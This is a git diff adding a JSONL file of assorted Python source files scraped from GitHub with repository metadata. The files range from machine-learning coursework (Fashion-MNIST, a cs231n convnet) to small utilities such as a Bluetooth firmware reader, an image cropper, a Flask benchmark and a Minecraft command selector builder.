diff --git "a/3780.jsonl" "b/3780.jsonl" new file mode 100644--- /dev/null +++ "b/3780.jsonl" @@ -0,0 +1,1572 @@ +{"seq_id":"24220166112","text":"# %%\nimport tensorflow as tf\nfrom tensorflow.keras import layers\nimport numpy as np\nimport tensorflow.keras as keras\nimport pydot\nimport matplotlib.pyplot as plt\ndef plot_fig(data):\n\tplt.figure()\n\tplt.imshow(data)\n\tplt.colorbar()\n\tplt.show()\n\ndef plot_image(i, predictions_array, true_label, img):\n predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100*np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n predictions_array, true_label = predictions_array[i], true_label[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1]) \n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n#%%\n(train_images, train_labels), (test_images, test_labels) = keras.datasets.fashion_mnist.load_data()\n#标签\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', \n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n#转为黑白图片\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n# print(train_images.shape, train_labels.shape,test_images.shape, test_labels.shape)\n# (60000, 28, 28) (60000,) (10000, 28, 28) (10000,)\n# keras.utils.plot_model(model, 'mnist_model.png')\n# keras.utils.plot_model(model, 'model_info.png', show_shapes=True)\n\n#构建模型\ndef train_model(ep):\n\tmodel = keras.Sequential(\n[\n layers.Flatten(input_shape=[28, 28]),\n layers.Dense(128, activation='relu'),\n layers.Dense(10, activation='sigmoid')\n])\n\tmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\tmodel.fit(train_images, train_labels, \n epochs=ep)\n\treturn model \nmodel1 = train_model(5)\npredictions = model.predict(test_images)\n\n#%%\n#监测损失/精度\n\n\n#%%\n# history = model.fit(train_images, train_labels, \n# epochs=5,\n# validation_data=(test_images,test_labels))\nprint('test loss:', test_scores[0])\nprint('test acc:', test_scores[1])\nplt.grid()\n#loss图 \nplt.plot(history.epoch, history.history.get('loss'),label='loss')\nplt.plot(history.epoch, history.history.get('val_loss'),label='val_loss')\nplt.legend()\n#accuracy图\nplt.plot(history.epoch, history.history.get('accuracy'),label='accuracy')\nplt.plot(history.epoch, history.history.get('val_accuracy'),label='val_accuracy')\nplt.legend()\n\n#%%\n#可视化结果\n# 可视化结果\nnum_rows = 5\nnum_cols = 3\nnum_images = num_rows*num_cols\nplt.figure(figsize=(2*2*num_cols, 2*num_rows))\nfor i in range(num_images):\n plt.subplot(num_rows, 2*num_cols, 2*i+1)\n plot_image(i, predictions, test_labels, test_images)\n plt.subplot(num_rows, 2*num_cols, 2*i+2)\n plot_value_array(i, predictions, test_labels)\nplt.show()\n\n\n","repo_name":"Alicewangggg/helloworld","sub_path":"TensorFlow_EX/minist.py","file_name":"minist.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32521242581","text":"from fast_rcnn.config import cfg\nfrom nms.gpu_nms import gpu_nms\nfrom nms.cpu_nms import cpu_nms\n\ndef nms(dets, thresh, force_cpu=False):\n \"\"\"Dispatch to either CPU or GPU NMS implementations.\"\"\"\n\n if dets.shape[0] == 0:\n return []\n if cfg.USE_GPU_NMS and not force_cpu:\n return gpu_nms(dets, thresh, device_id=cfg.GPU_ID)\n else:\n return cpu_nms(dets, thresh)\n","repo_name":"rbgirshick/py-faster-rcnn","sub_path":"lib/fast_rcnn/nms_wrapper.py","file_name":"nms_wrapper.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":7993,"dataset":"github-code","pt":"32"} +{"seq_id":"1990877760","text":"import gatt\n\nfrom argparse import ArgumentParser\n\nclass AnyDevice(gatt.Device):\n def services_resolved(self):\n super().services_resolved()\n\n device_information_service = next(\n s for s in self.services\n if s.uuid == '0000180a-0000-1000-8000-00805f9b34fb')\n\n firmware_version_characteristic = next(\n c for c in device_information_service.characteristics\n if c.uuid == '00002a26-0000-1000-8000-00805f9b34fb')\n\n firmware_version_characteristic.read_value()\n\n def characteristic_value_updated(self, characteristic, value):\n print(\"Firmware version:\", value.decode(\"utf-8\"))\n\n\narg_parser = ArgumentParser(description=\"GATT Read Firmware Version Demo\")\narg_parser.add_argument('mac_address', help=\"MAC address of device to connect\")\nargs = arg_parser.parse_args()\n\nmanager = gatt.DeviceManager(adapter_name='hci0')\n\ndevice = AnyDevice(manager=manager, mac_address=args.mac_address)\ndevice.connect()\n\nmanager.run()\n","repo_name":"getsenic/gatt-python","sub_path":"examples/read_firmware_version.py","file_name":"read_firmware_version.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"32"} +{"seq_id":"35434692893","text":"import argparse\nimport csv\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as opt\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom dataset import MyDataset\nfrom torchvision import models\n\n\ndef main(args):\n np.random.seed(12345)\n torch.manual_seed(12345)\n torch.cuda.manual_seed_all(12345)\n\n model = models.vgg16(pretrained=True)\n model.classifier[0] = nn.Linear(8*8*512, 4096)\n model.classifier[6] = nn.Linear(4096, 27)\n model.load_state_dict(torch.load(\"model.pth\"))\n \n dataset_test = MyDataset(args.pickle_path, args.test_list_path, args.test_dir)\n test_loader = DataLoader(dataset_test, batch_size=args.batch_size, shuffle=False)\n \n device = torch.device(\"cpu\" if args.no_cuda else \"cuda:0\")\n model = model.to(device)\n \n model.eval()\n correct = 0\n with open(args.result_path, 'w') as f:\n writer = csv.writer(f)\n with torch.no_grad():\n for data in tqdm(test_loader):\n x, y = data\n x = x.to(device)\n y = y.to(device)\n out = model(x)\n _, pred = torch.max(out.data, 1)\n result = torch.stack((y, pred), dim=1).cpu().numpy()\n writer.writerows(result)\n correct += (y == pred).sum().item()\n\n # loss = batch_loss/len(test_loader)\n accuracy = correct / len(test_loader.dataset)\n print(accuracy)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--test_list_path\", required=True, help=\"location of test files list\")\n parser.add_argument(\"--test_dir\", required=True, help=\"location of test files directory\")\n parser.add_argument(\"--pickle_path\", required=True, help=\"location of pickle file\")\n parser.add_argument(\"--batch_size\", type=int, default=50, help=\"batch size\")\n parser.add_argument(\"--result_path\", default=\"./result.csv\", help=\"output location\")\n\n parser.add_argument(\"--model_path\", required=True, help=\"location of saved weight\")\n parser.add_argument(\"--optimizer_path\", default=\"opt.pth\", help=\"parameters updated every epoch\")\n parser.add_argument(\"--no-cuda\", action=\"store_true\", help=\"disable GPU\")\n parser.add_argument(\"--num_workers\", type=int, default=1, help=\"number of threads for dataloader\")\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"hideki-kaneko/TGN","sub_path":"infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5292201783","text":"import random\nword=\"music\"\n\n#function name: scramble_word()\n# arguments:word\ndef scramble_word(word):\n #make the string a list so that you can use the index\n split=list(word)\n #remove the first and last letters of the word so that they are not scrambled\n first_letter=split[0]\n last_letter=split[-1]\n #same the rest of the letters in a variable\n shuffle_letters=split[0:-1]\n #shuffle the rest of the letters left\n random.shuffle(shuffle_letters)\n #put the word back together\n shuffle_letters.insert(0,first_letter)\n shuffle_letters.append(last_letter)\n final=\"\".join(shuffle_letters)\n print(final)\nscramble_word(word)\n\n \n\nsentence=\"The tree threw three tanks today.\"\n#function name: scramble_phrase\n# argument:sentence\n# purpose:scramble the phrase, use string.split()\n# return:the scrambled phrase\ndef scramble_phrase(sentence):\n sentence.split(\"t\")\n ","repo_name":"lilianaperezdiaz/cspp10","sub_path":"unit5/Lperez_scramble.py","file_name":"Lperez_scramble.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38588941164","text":"from PIL import Image\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\n\nmypath = r\"C:\\Users\\admin\\PycharmProjects\\FireEmblemClone\\Resources\\Images\\Atlas Files\"\nsavepath = r\"C:\\Users\\admin\\PycharmProjects\\FireEmblemClone\\Resources\\Images\\Cropped Atlas Files\"\nimagefiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n\nimagefile = (r\"C:\\Users\\admin\\PycharmProjects\\FireEmblemClone\\Resources\\Images\\Common_Window.png\")\n\n\ndef singleton(image, top, left, bottom, right):\n original = Image.open(image)\n\n width, height = original.size # Get dimensions\n left = left\n top = top\n right = right\n bottom = bottom\n cropped_example = original.crop((left, top, right, bottom))\n\n cropped_example.save(join(savepath) + r\"\\Test.png\", \"PNG\")\n print(\"Singleton Complete\")\n\n\n# singleton(imagefile, 0, 0, 375, 1483)\n\ndef multiImage():\n for i in imagefiles:\n image = Image.open(join(mypath, i))\n image.load()\n\n image_data = np.asarray(image)\n image_data_bw = image_data.max(axis=2)\n non_empty_columns = np.where(image_data_bw.max(axis=0) > 0)[0]\n non_empty_rows = np.where(image_data_bw.max(axis=1) > 0)[0]\n cropBox = (min(non_empty_rows), max(non_empty_rows), min(non_empty_columns), max(non_empty_columns))\n\n image_data_new = image_data[cropBox[0]:cropBox[1] + 1, cropBox[2]:cropBox[3] + 1, :]\n\n new_image = Image.fromarray(image_data_new)\n new_image.save(join(savepath + r\"\\Cropped_\" + i))\n\n\nmultiImage()\n\nprint(\"Task complete\")\n","repo_name":"WhisperingShadows/FireEmblemClone","sub_path":"Tools/CroppedAtlasGenerator.py","file_name":"CroppedAtlasGenerator.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"15859293900","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plot\nimport seaborn\nimport time\n\nfrom assignment4.numba_integrator import numba_integrate\nfrom assignment4.numpy_integrator import numpy_integrate\n\n\ndef integrate(fn, a, b, n):\n if n <= 0:\n raise ValueError\n h = float(b - a) / n\n s = 0\n for i in range(n):\n s += fn(a + i * h) * h\n return s\n\n\ndef midpoint_integrate(fn, a, b, n):\n if n <= 0:\n raise ValueError\n h = float(b - a) / n\n s = 0\n for i in range(n):\n s += h*fn(a + h/2 + i*h)\n return s\n\n\ndef f(x):\n return x ** 2\n\n\ndef plottus(x, y):\n plot.yscale(\"log\")\n plot.title(\"Error as a function of N\")\n plot.xlabel(\"N\")\n plot.ylabel(\"Error\")\n plot.plot(x, y, \"b-o\")\n plot.show()\n\n\nif __name__ == '__main__':\n pn = []\n pe = []\n for n in [10, 100, 1000, 10000, 100000, 500000, 1000000]:\n pn.append(n)\n k = integrate(f, 0, 1, n)\n pe.append(1/3 - k)\n print(\"N {} K {} E {}\".format(n, k, pe[len(pe) - 1]))\n\n plottus(pn, pe)\n\n start = time.time()\n k = integrate(f, 0, 1, 100000000)\n elapsed = (time.time() - start)\n print(\"Result {} time took {}\".format(k, elapsed))\n start = time.time()\n k = numpy_integrate(f, 0, 1, 100000000)\n elapsed = (time.time() - start)\n print(\"Result {} time took with numpy {}\".format(k, elapsed))\n start = time.time()\n k = numba_integrate(f, 0, 1, 100000000)\n elapsed = (time.time() - start)\n print(\"Result {} time took with numba {}\".format(k, elapsed))\n","repo_name":"goudbes/UiO","sub_path":"INF3331/assignment-4/integrator.py","file_name":"integrator.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32570324406","text":"import datetime\r\n\r\nbalance = 1000\r\naccount_log = []\r\n\r\ndef validate(func):\r\n def wrapper(*args,**kwargs):\r\n amount =str(args[0])\r\n index = amount.index(\".\")\r\n if len(amount) - index - 1 > 2 :\r\n print(\"输入格式有误,小数点后面最多保留2位\")\r\n else:\r\n func(*args,**kwargs)\r\n return wrapper\r\n\r\n@validate\r\ndef deposit(amount):\r\n \"\"\"\r\n 存款\r\n :param amount:存入金额\r\n :return:noun\r\n \"\"\"\r\n global balance\r\n balance += amount\r\n write_log(amount,\"存入\")\r\n\r\n@validate\r\ndef withdraw(amount):\r\n \"\"\"\r\n 取款\r\n :param amount: 金额\r\n :return:\r\n \"\"\"\r\n global balance\r\n if balance < amount:\r\n print(f\"余额不足\")\r\n else:\r\n balance-=amount\r\n write_log(amount,\"取出\")\r\n\r\ndef write_log(amount,type):\r\n \"\"\"\r\n 写入日志\r\n :param amount: 金额\r\n :param type:存入 或者 取出\r\n :return:Noun\r\n \"\"\"\r\n now = datetime.datetime.now()\r\n creat_time = now.strftime(\"%y-%m-%d %H:%M:%S\")\r\n data = [creat_time,type,amount,f\"{balance:.2f}\"]\r\n account_log.append(data)\r\n\r\ndef print_log():\r\n \"\"\"\r\n 查看流水\r\n :return:Noun\r\n \"\"\"\r\n print(account_log)\r\n\r\ndef show_menu():\r\n menu = \"\"\"\r\n操作菜单\r\n0:退出\r\n1:存款\r\n2:取款\r\n3:打印交易信息\r\n \"\"\"\r\n print(menu)\r\n\r\nwhile True:\r\n show_menu()\r\n num = int(input(\"请根据菜单编号输入: \"))\r\n if num == 0:\r\n print(\"您已经退出系统\")\r\n break\r\n elif num == 1:\r\n print(\"存款\")\r\n amount = float(input(\"请输入存款���额:\"))\r\n deposit(amount)\r\n print(f\"当前余额{balance:.2f}\")\r\n elif num == 2:\r\n print (\"取款\")\r\n amount = float(input(\"请输入取款金额:\"))\r\n withdraw(amount)\r\n print(f\"当前余额{balance:.2f}\")\r\n elif num == 3:\r\n print(\"查看记录\")\r\n print_log()\r\n else:\r\n print(\"输入有误\")\r\n\r\n","repo_name":"code-long-cpu/Python_SelfStudy","sub_path":"comprehension_practice.py","file_name":"comprehension_practice.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1066647645","text":"n = int(input())\r\ndict = {}\r\n\r\nfor i in range(1, n+1):\r\n data = input().split(' ')\r\n dict[data[0]] = data[1]\r\n\r\na = input()\r\nwhile a:\r\n if a in dict:\r\n print(a + '=' + dict.get(a))\r\n else:\r\n print('Not found')\r\n try:\r\n a = input()\r\n except:\r\n a = False\r\n\r\n\r\n\r\n","repo_name":"ajGingrich/hackerrank-algorithms","sub_path":"30-days-of-code/day-8-dictionary-and-maps/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35886973352","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport os\nimport time\nimport math\n\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\napp.debug = False\n\n\ndef prime(max):\n table = [False] * max\n i_max = int(math.sqrt(max)) + 2\n\n if max < 3:\n return -1\n\n # init table\n table[0] = table[1] = True # 0 & 1 is not prime number\n\n # make table\n for i in range(2, i_max):\n if not table[i]:\n for j in range(i + i, max, i):\n table[j] = True\n\n # search\n for i in reversed(range(0, max - 1)):\n if not table[i]:\n return i\n\n return -1\n\n\n\n@app.route('/benchmark/simple')\ndef simple():\n result = {\n 'ok': True,\n 'language': 'Python',\n 'framework': 'Flask',\n 'now': int(time.clock()),\n }\n return jsonify(result)\n\n\n@app.route('/benchmark/cpu')\ndef cpu():\n max = int(request.args.get('max'))\n\n result = {\n 'ok': True,\n 'max': max,\n 'result': prime(max),\n }\n return jsonify(result)\n\n\n\nif __name__ == '__main__':\n app.run(port = int(os.environ['PORT']))\n\n# vim: se et ts=8 sw=4 sts=4 ft=python :\n","repo_name":"pine/waf_benchmark","sub_path":"python_flask_sample/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"633807814","text":"from itertools import combinations\nimport sys\n\ndef calc_dist(chicken, house):\n c_x, c_y = chicken\n h_x, h_y = house\n return abs(c_x-h_x)+abs(c_y-h_y)\n\nN, M = map(int, input().split())\nm = []\nhouse = []\nchicken = []\nc_distance = {}\nanswer = sys.maxsize\n\nfor i in range(N):\n tmp = []\n for j, c in enumerate(map(int, input().split())):\n if c == 1:\n house.append((i, j))\n if c == 2:\n chicken.append((i, j))\n tmp.append(c)\n m.append(tmp)\n\nfor d in range(1, M+1):\n for comb in combinations(chicken, d):\n c_d = 0\n for h in house:\n c_d += min(map(lambda x: calc_dist(h, x), comb))\n answer = min(answer, c_d)\nprint(answer)","repo_name":"Isaac-Lee/BOJ-Algorithm","sub_path":"Python_Solutions/15686.py","file_name":"15686.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"3920081197","text":"import numpy as np\n\nfrom cs231n.layers import *\nfrom cs231n.fast_layers import *\nfrom cs231n.layer_utils import *\n\n\nclass MyCifar10Model(object):\n \"\"\"\n A convolutional network with the following architecture:\n \n [conv - BN - relu - 2x2 max pool]x3 - affine - BN - relu - affine - softmax\n \n The network operates on minibatches of data that have shape (N, C, H, W)\n consisting of N images, each with height H and width W and with C input\n channels.\n \"\"\"\n \n def __init__(self, input_dim=(3, 32, 32), num_filters=(64,32,32), filter_size=(3,3,3),\n hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0,\n dtype=np.float32):\n \"\"\"\n Initialize a new network.\n \n Inputs:\n - input_dim: Tuple (C, H, W) giving size of input data\n - num_filters: Number of filters to use in the convolutional layer\n - filter_size: Size of filters to use in the convolutional layer\n - hidden_dim: Number of units to use in the fully-connected hidden layer\n - num_classes: Number of scores to produce from the final affine layer.\n - weight_scale: Scalar giving standard deviation for random initialization\n of weights.\n - reg: Scalar giving L2 regularization strength\n - dtype: numpy datatype to use for computation.\n \"\"\"\n self.params = {}\n self.reg = reg\n self.dtype = dtype\n \n self.bn_param1 = {'mode': 'train'}\n self.bn_param2 = {'mode': 'train'}\n self.bn_param3 = {'mode': 'train'}\n self.bn_param4 = {'mode': 'train'}\n \n C, H, W = input_dim\n self.params['W1'] = weight_scale * np.random.randn(num_filters[0], C, filter_size[0], filter_size[0])\n self.params['W2'] = weight_scale * np.random.randn(num_filters[1], num_filters[0], filter_size[1], filter_size[1])\n self.params['W3'] = weight_scale * np.random.randn(num_filters[2], num_filters[1], filter_size[2], filter_size[2])\n self.params['W4'] = weight_scale * np.random.randn(num_filters[2]*(H/8)*(W/8), hidden_dim)\n self.params['W5'] = weight_scale * np.random.randn(hidden_dim, num_classes)\n self.params['b1'] = np.zeros((num_filters[0],))\n self.params['b2'] = np.zeros((num_filters[1],))\n self.params['b3'] = np.zeros((num_filters[2],))\n self.params['b4'] = np.zeros((hidden_dim,))\n self.params['b5'] = np.zeros((num_classes,))\n self.params['gamma1'], self.params['beta1'] = np.ones((num_filters[0],)), np.zeros((num_filters[0],))\n self.params['gamma2'], self.params['beta2'] = np.ones((num_filters[1],)), np.zeros((num_filters[1],))\n self.params['gamma3'], self.params['beta3'] = np.ones((num_filters[2],)), np.zeros((num_filters[2],))\n self.params['gamma4'], self.params['beta4'] = np.ones((hidden_dim,)), np.zeros((hidden_dim,))\n\n for k, v in self.params.iteritems():\n self.params[k] = v.astype(dtype)\n \n \n def loss(self, X, y=None):\n \"\"\"\n Evaluate loss and gradient for the three-layer convolutional network.\n \n Input / output: Same API as TwoLayerNet in fc_net.py.\n \"\"\"\n \n mode = 'test' if y is None else 'train'\n self.bn_param1['mode'], self.bn_param2['mode'] = mode, mode\n self.bn_param3['mode'], self.bn_param4['mode'] = mode, mode\n \n W1, b1, gamma1, beta1 = self.params['W1'], self.params['b1'], self.params['gamma1'], self.params['beta1']\n W2, b2, gamma2, beta2 = self.params['W2'], self.params['b2'], self.params['gamma2'], self.params['beta2']\n W3, b3, gamma3, beta3 = self.params['W3'], self.params['b3'], self.params['gamma3'], self.params['beta3']\n W4, b4, gamma4, beta4 = self.params['W4'], self.params['b4'], self.params['gamma4'], self.params['beta4']\n W5, b5 = self.params['W5'], self.params['b5']\n \n # pass conv_param to the forward pass for the convolutional layer\n conv_param1 = {'stride': 1, 'pad': (W1.shape[2] - 1) / 2}\n conv_param2 = {'stride': 1, 'pad': (W2.shape[2] - 1) / 2}\n conv_param3 = {'stride': 1, 'pad': (W3.shape[2] - 1) / 2}\n\n # pass pool_param to the forward pass for the max-pooling layer\n pool_param = {'pool_height': 2, 'pool_width': 2, 'stride': 2}\n\n scores = X\n scores, cache1 = conv_bn_relu_pool_forward(scores, W1, b1, gamma1, beta1, conv_param1, self.bn_param1, pool_param)\n scores, cache2 = conv_bn_relu_pool_forward(scores, W2, b2, gamma2, beta2, conv_param2, self.bn_param2, pool_param)\n scores, cache3 = conv_bn_relu_pool_forward(scores, W3, b3, gamma3, beta3, conv_param3, self.bn_param3, pool_param)\n scores, cache4 = affine_bn_relu_forward(scores, W4, b4, gamma4, beta4, self.bn_param4)\n scores, cache5 = affine_forward(scores, W5, b5)\n \n if y is None:\n return scores\n \n loss, grads = 0, {}\n \n loss, ds = softmax_loss(scores, y)\n ds, dW5, db5 = affine_backward(ds, cache5)\n ds, dW4, db4, dgamma4, dbeta4 = affine_bn_relu_backward(ds, cache4)\n ds, dW3, db3, dgamma3, dbeta3 = conv_bn_relu_pool_backward(ds, cache3)\n ds, dW2, db2, dgamma2, dbeta2 = conv_bn_relu_pool_backward(ds, cache2)\n dx, dW1, db1, dgamma1, dbeta1 = conv_bn_relu_pool_backward(ds, cache1)\n loss += 0.5 * self.reg * sum([np.sum(w*w) for w in [W1, W2, W3, W4, W5, b1, b2, b3, b4, b5, gamma1, gamma2, gamma3, gamma4, beta1, beta2, beta3, beta4]])\n grads = {\n 'W1': dW1 + self.reg * np.sum(W1),\n 'W2': dW2 + self.reg * np.sum(W2),\n 'W3': dW3 + self.reg * np.sum(W3),\n 'W4': dW4 + self.reg * np.sum(W4),\n 'W5': dW5 + self.reg * np.sum(W5),\n 'b1': db1 + self.reg * np.sum(b1),\n 'b2': db2 + self.reg * np.sum(b2),\n 'b3': db3 + self.reg * np.sum(b3),\n 'b4': db4 + self.reg * np.sum(b4),\n 'b5': db5 + self.reg * np.sum(b5),\n 'gamma1': dgamma1 + self.reg * np.sum(gamma1),\n 'gamma2': dgamma2 + self.reg * np.sum(gamma2),\n 'gamma3': dgamma3 + self.reg * np.sum(gamma3),\n 'gamma4': dgamma4 + self.reg * np.sum(gamma4),\n 'beta1': beta1 + self.reg * np.sum(beta1),\n 'beta2': beta2 + self.reg * np.sum(beta2),\n 'beta3': beta3 + self.reg * np.sum(beta3),\n 'beta4': beta4 + self.reg * np.sum(beta4)}\n ############################################################################\n # END OF YOUR CODE #\n ############################################################################\n \n return loss, grads\n","repo_name":"kamikat/cs231n","sub_path":"assignment2/cs231n/classifiers/convnet.py","file_name":"convnet.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44044750657","text":"\"\"\"\n@ARTHUR:rkp\n\"\"\"\nfrom sqliteorm.sqlite_base import SqliteClient,sqlite\n\nclass SqliteBackendBase():\n \"\"\"not implemented\"\"\"\n def __init__(\n self,\n db_path=None,\n ) -> None:\n self.db_path = db_path\n\n @property\n def get_db(self):\n if self.db_path:\n db = SqliteClient(db_path=self.db_path,conn=None)\n else:\n db = sqlite\n return db","repo_name":"hvo7mdq/sqlite_orm","sub_path":"sqliteorm/sqlite_backend.py","file_name":"sqlite_backend.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3522265074","text":"from project_template.datamodels import common_utils\n\n\nclass Position(common_utils.IterableEnum):\n GENERAL_SECRETARY = \"Secretar General\"\n DEPUTY = \"Deputat\"\n SENATOR = \"Senator\"\n MEMBER_OF_PARLIAMENT = \"Parlamentar\"\n PRIME_MINISTER = \"Prim Ministru\"\n VICE_PRIME_MINISTER = \"Vice Prim Ministru\"\n MINISTER = \"Minister\"\n DEPUTY_CHAMBER_PRESIDENT = \"Presedinte Camera Deputatilor\"\n SENATE_PRESIDENT = \"Presedinte Senat\"\n PRESIDENT = \"Presedinte\"\n COUNSELOR = \"Consilier\"\n STATE_SECRETARY = \"Secretar de Stat\"\n OTHER = \"Alta Valoare\"\n","repo_name":"code4romania/asset-declarations","sub_path":"project_template/datamodels/position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"2795268458","text":"from typing import Union\n\nfrom nbtlib.tag import Compound\n\nfrom onyx.class_types import Buildable\nfrom onyx.dev_util import (dict_to_advancement_selector,\n dict_to_score_selector, translate)\nfrom onyx.registries import entity_sort, gamemode, selector_type\nfrom onyx.util import Range\n\n\nclass Selector(Buildable):\n \"\"\"\n Selector - Represents a selector\n\n Args:\n type (selector_type, optional): The type of selector (``@e``, ``@s`, etc.). Defaults to selector_type.all_entities.\n advancements (dict, optional): The advancements of the entity. Defaults to None.\n distance (Union[int, Range], optional): The distance of the entity from a certain point. Defaults to None.\n dx (int, optional): How far away the entity can be from ``x`` in the positive X-axis. Defaults to None.\n dy (int, optional): How far away the entity can be from ``y`` in the positive Y-axis. Defaults to None.\n dz (int, optional): How far away the entity can be from ``z`` in the positive Z-axis. Defaults to None.\n gamemode (gamemode, optional): The gamemode of the entity. Defaults to None.\n level (int, optional): The experience points the entity must have. Defaults to None.\n limit (int, optional): The amount of entities that can be selected. Defaults to None.\n name (str, optional): The name of the entity. Defaults to None.\n nbt (Compound, optional): The NBT of the entity. Defaults to None.\n predicate (Union[str, list], optional): The predicates that must apply to the entity. Defaults to None.\n scores (dict, optional): The scores of the entity. Should be given as a dictionary with the keys being the objectives and the values being the values. Defaults to None.\n sort (entity_sort, optional): How the entities will be sorted if multiple are selected. Defaults to None.\n tag (Union[str, list], optional): The tags of the entity. If this is a list, then multiple ``tag`` entries will be created in the selector. Example: ``tag=[\"tag1\", \"tag2\"]`` => ``tag=tag1, tag=2``. Defaults to None.\n team (Union[str, list], optional): The team of the entity. If this is a list, then multiple ``team`` entries will be created in the selector. Example: ``team=[\"team1\", \"team2\"]`` => ``team=team1, team=team2``. However, this selector will always fail, since an entity can only be on one team. As such, a list should only be specified if you're negating multiple teams. Defaults to None.\n x (int, optional): The point on the X-axis of the entity. Defaults to None.\n y (int, optional): The point on the Y-axis of the entity. Defaults to None.\n z (int, optional): The point on the Z-axis of the entity. Defaults to None.\n x_rotation (Union[int, Range], optional): The rotation of the entity on the X-axis (vertical). Defaults to None.\n y_rotation (Union[int, Range], optional): The rotation of the entity on the Y-axis (horizontal). Defaults to None.\n \"\"\"\n def __init__(self, type: selector_type = selector_type.all_entities, advancements: dict = None, \n distance: Union[int, Range] = None, dx: int = None, dy: int = None, dz: int = None, \n gamemode: gamemode = None, level: int = None, limit: int = None, name: str = None,\n nbt: Compound = None, predicate: Union[str, list] = None, scores: dict = None,\n sort: entity_sort = None, tag: Union[str, list] = None, team: Union[str, list] = None,\n x: int = None, y: int = None, z: int = None, x_rotation: Union[int, Range] = None,\n y_rotation: Union[int, Range] = None) -> None:\n\n self.type = type\n self.advancements = advancements\n self.distance = distance\n self.dx = dx\n self.dy = dy\n self.dz = dz\n self.gamemode = gamemode\n self.level = level\n self.limit = limit\n self.name = name\n self.nbt = nbt\n self.predicate = predicate\n self.scores = scores\n self.sort = sort\n self.tag = tag\n self.team = team\n self.x = x\n self.y = y\n self.z = z\n self.x_rotation = x_rotation\n\n\n def build(self) -> str:\n \"\"\"\n build - Returns the built selector\n\n Returns:\n str: The built selector\n \"\"\"\n advancements, name, scores = None, None, None\n\n if self.advancements:\n advancements = dict_to_advancement_selector(self.advancements)\n\n if self.name:\n name = f\"'{self.name}'\"\n\n if self.scores:\n scores = dict_to_score_selector(self.scores)\n\n output = []\n for key, item in vars(self).items():\n if item and key != \"type\":\n if key in {\"gamemode\", \"level\", \"name\", \"tag\", \"team\", \"predicate\"} and isinstance(item, list):\n for arg in item:\n output.append(f\"{translate(key)}={translate(arg)}\")\n # This awful special case needs to exist because overwriting the class attributes makes building the selector more than once error out, and copying, overwriting, appending to output, and rewriting the copy back to the class attribute is even worse\n elif key == \"advancements\" and advancements:\n output.append(f\"{translate(key)}={translate(advancements)}\")\n elif key == \"name\" and name:\n output.append(f\"{translate(key)}={translate(name)}\")\n elif key == \"scores\" and scores:\n output.append(f\"{translate(key)}={translate(scores)}\")\n else:\n output.append(f\"{translate(key)}={translate(item)}\")\n\n if output:\n return f\"{translate(self.type)}[{', '.join(output)}]\"\n else:\n return translate(self.type)\n","repo_name":"DoubleF3lix/onyx","sub_path":"onyx/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} 